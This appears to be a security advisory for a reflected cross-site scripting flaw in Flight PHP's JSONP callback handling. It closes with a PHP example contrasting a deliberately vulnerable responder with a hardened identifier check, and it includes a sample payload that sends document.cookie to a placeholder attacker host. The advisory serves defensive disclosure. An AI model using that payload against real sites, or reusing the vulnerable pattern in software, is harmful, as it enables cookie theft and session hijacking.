Flight PHP Reflected Cross-Site Scripting Vulnerability in JSONP Callback Handling
Vulnerability
A reflected cross-site scripting vulnerability has been identified in Flight PHP versions prior to 3.18.1. The issue lies in the Flight::jsonp() method, which reads the callback name from the ?jsonp= query parameter and concatenates it, without validation, into a response served with the application/javascript content type. Because the callback name is not restricted to a valid JavaScript identifier, an attacker who controls that parameter can inject arbitrary JavaScript, which executes in the origin of the response whenever the response is evaluated as a script.
Impact
Exploitation of this vulnerability results in reflected cross-site scripting: the injected JavaScript executes in the browser of the user whose request carries the crafted parameter. A browser that navigates to the endpoint directly displays an application/javascript response as text rather than executing it, so the payload runs when the response is loaded as a script, for example through a <script src="..."> tag. When that inclusion comes from a page in the same origin as the vulnerable API, the injected code runs with that origin's privileges, which can lead to cookie theft (for cookies not marked HttpOnly), authenticated requests on the victim's behalf, and session hijacking.
Reproduction
To reproduce this vulnerability, send a GET request to an API endpoint that responds via Flight::jsonp() and set the ?jsonp= parameter to a value that is not a plain callback name but a JavaScript statement, for example one that closes a dummy call and then fetches data from an external site. The unpatched response body contains the parameter verbatim, which confirms the missing validation. When that URL is loaded as a script from a same-origin page, the injected JavaScript executes, demonstrating the cross-site scripting vulnerability.
Remediation
Upgrade to Flight PHP version 3.18.1 or later, where this vulnerability has been fixed: the patched Flight::jsonp() validates the JSONP callback name before including it in the response. Where an immediate upgrade is not possible, the same effect can be obtained in application code by rejecting any ?jsonp= value that is not a plain JavaScript identifier before it reaches Flight::jsonp().
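As an added example that is not Flight PHP's own code nor the 3.18.1 patch, the standalone PHP below contrasts a JSONP responder written the way the Reproduction section describes the vulnerable behaviour with a hardened one that restricts the callback to a JavaScript identifier, as the Remediation section describes. The function names, the identifier grammar, the length bound and the sample payload are assumptions made for illustration and are not taken from Flight's source.

```php
<?php
// Added example, not Flight PHP's own code. Minimal JSONP responder written
// the way the advisory describes the vulnerable behaviour, beside a hardened
// version. All names below are illustrative assumptions.

declare(strict_types=1);

// Vulnerable pattern: whatever arrived in ?jsonp= is concatenated verbatim
// into a body that will be served as application/javascript.
function jsonp_vulnerable(array $data, string $callback): string
{
    return $callback . '(' . json_encode($data) . ');';
}

// Hardened pattern: accept only a dotted JavaScript identifier path
// (e.g. "cb", "app.handlers.onData") and reject everything else.
function is_valid_jsonp_callback(string $callback): bool
{
    // Length bound plus a strict identifier grammar. Both are assumptions
    // about what a safe callback looks like, not the exact check the patched
    // Flight release performs.
    if ($callback === '' || strlen($callback) > 64) {
        return false;
    }
    $identifier = '[A-Za-z_$][A-Za-z0-9_$]*';
    return preg_match('/\A' . $identifier . '(\.' . $identifier . ')*\z/', $callback) === 1;
}

function jsonp_hardened(array $data, string $callback): string
{
    if (!is_valid_jsonp_callback($callback)) {
        throw new InvalidArgumentException('Invalid JSONP callback name');
    }
    // The leading /**/ comment is a common JSONP defence against content
    // sniffing; serving the body with X-Content-Type-Options: nosniff is the
    // complementary header. Neither replaces the identifier check above.
    return '/**/' . $callback . '(' . json_encode($data) . ');';
}

// Constructed sample input: an attacker-supplied callback that closes a
// harmless call and appends its own statement, as the Reproduction section
// describes. The host name is a placeholder.
$payload = 'x();fetch("https://attacker.example/?c=" + document.cookie);//';
$data = ['status' => 'ok'];

echo "vulnerable: ", jsonp_vulnerable($data, $payload), PHP_EOL;

foreach (['cb', 'app.handlers.onData', $payload, 'alert(1)', '1bad', ''] as $name) {
    printf("%-70s %s\n", var_export($name, true),
        is_valid_jsonp_callback($name) ? 'accepted' : 'rejected');
}

try {
    echo jsonp_hardened($data, $payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo "hardened: payload rejected (", $e->getMessage(), ")", PHP_EOL;
}
echo "hardened: ", jsonp_hardened($data, 'cb'), PHP_EOL;
```

Running the file with the PHP CLI shows the vulnerable body beginning with the attacker's fetch() statement, while the hardened responder refuses the same value and only emits the call for a well-formed callback name. The identifier grammar is deliberately conservative: it admits the names real JSONP clients generate (including dotted paths) and nothing that can terminate a statement or open a call.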
